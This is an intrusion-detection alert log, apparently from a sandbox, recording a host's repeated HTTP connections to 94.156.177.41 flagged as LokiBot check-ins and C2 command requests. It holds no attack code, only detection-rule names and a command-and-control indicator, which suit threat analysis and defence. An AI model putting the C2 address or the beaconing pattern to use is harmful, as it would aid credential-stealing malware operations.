2025-01-10T23:40:20.066732+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:20.316028+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:20.316028+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:20.316028+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.045311+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.045311+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-10T23:40:21.201505+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:21.201505+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:21.201505+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:21.955338+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:21.955338+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-10T23:40:22.115264+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:22.115264+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:22.115264+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:22.833111+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:22.833111+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-10T23:40:23.003055+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.003055+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.003055+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.751820+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.751820+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-10T23:40:23.937030+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:23.937030+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:23.937030+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:24.799360+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:24.799360+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-10T23:40:24.962376+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:24.962376+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:24.962376+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:25.745524+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:25.745524+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-10T23:40:25.899746+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:25.899746+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:25.899746+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:26.637887+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:26.637887+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-10T23:40:26.796508+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:26.796508+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:26.796508+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:27.986716+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:27.986716+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-10T23:40:28.348116+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:28.348116+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:28.348116+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.071409+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.071409+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-10T23:40:29.251180+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:29.251180+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:29.251180+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:29.972876+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:29.972876+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-10T23:40:30.129740+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.129740+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.129740+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.832317+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.832317+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-10T23:40:30.989628+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:30.989628+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:30.989628+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:31.733241+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:31.733241+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-10T23:40:31.883334+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:31.883334+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:31.883334+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:32.606354+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:32.606354+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-10T23:40:32.757846+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:32.757846+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:32.757846+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:33.445790+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:33.445790+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-10T23:40:33.600822+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:33.600822+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:33.600822+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:34.369359+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:34.369359+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-10T23:40:34.524652+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:34.524652+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:34.524652+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:35.253709+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:35.253709+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-10T23:40:35.419613+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:35.419613+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:35.419613+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:36.154474+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:36.154474+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-10T23:40:36.312373+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:36.312373+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:36.312373+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.040945+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.040945+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-10T23:40:37.191586+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:37.191586+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:37.191586+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:37.887352+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:37.887352+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-10T23:40:38.038961+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.038961+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.038961+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.783876+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.783876+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-10T23:40:38.946533+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:38.946533+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:38.946533+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:39.680469+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:39.680469+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-10T23:40:39.839305+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:39.839305+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:39.839305+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:40.580294+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:40.580294+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-10T23:40:40.741383+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:40.741383+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:40.741383+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:41.452593+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:41.452593+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-10T23:40:41.627956+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:41.627956+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:41.627956+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:42.341481+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:42.341481+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-10T23:40:42.493662+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:42.493662+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:42.493662+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:43.231137+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:43.231137+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-10T23:40:43.387530+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:43.387530+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:43.387530+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.110314+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.110314+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-10T23:40:44.267924+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:44.267924+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:44.267924+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:44.984978+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:44.984978+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-10T23:40:45.492998+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:45.492998+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:45.492998+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:46.211611+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:46.211611+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-10T23:40:46.379070+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:46.379070+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:46.379070+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.089896+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.089896+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-10T23:40:47.277778+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:47.277778+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:47.277778+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:47.998043+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:47.998043+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-10T23:40:48.293317+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:48.293317+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:48.293317+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.004508+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.004508+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-10T23:40:49.166292+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:49.166292+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:49.166292+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:49.868094+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:49.868094+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-10T23:40:50.031343+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.031343+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.031343+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.722392+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.722392+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-10T23:40:50.883229+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:50.883229+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:50.883229+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:51.592376+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:51.592376+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-10T23:40:51.744360+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:51.744360+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:51.744360+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:52.429020+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:52.429020+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-10T23:40:52.588350+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:52.588350+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:52.588350+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:53.287063+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:53.287063+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-10T23:40:53.449991+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:53.449991+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:53.449991+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:54.256299+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:54.256299+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-10T23:40:54.439684+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:54.439684+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:54.439684+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:55.149707+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:55.149707+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-10T23:40:55.316604+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:55.316604+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:55.316604+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.057969+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.057969+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-10T23:40:56.210746+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:56.210746+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:56.210746+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:56.939599+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:56.939599+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-10T23:40:57.158429+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50076	94.156.177.41	80	TCP
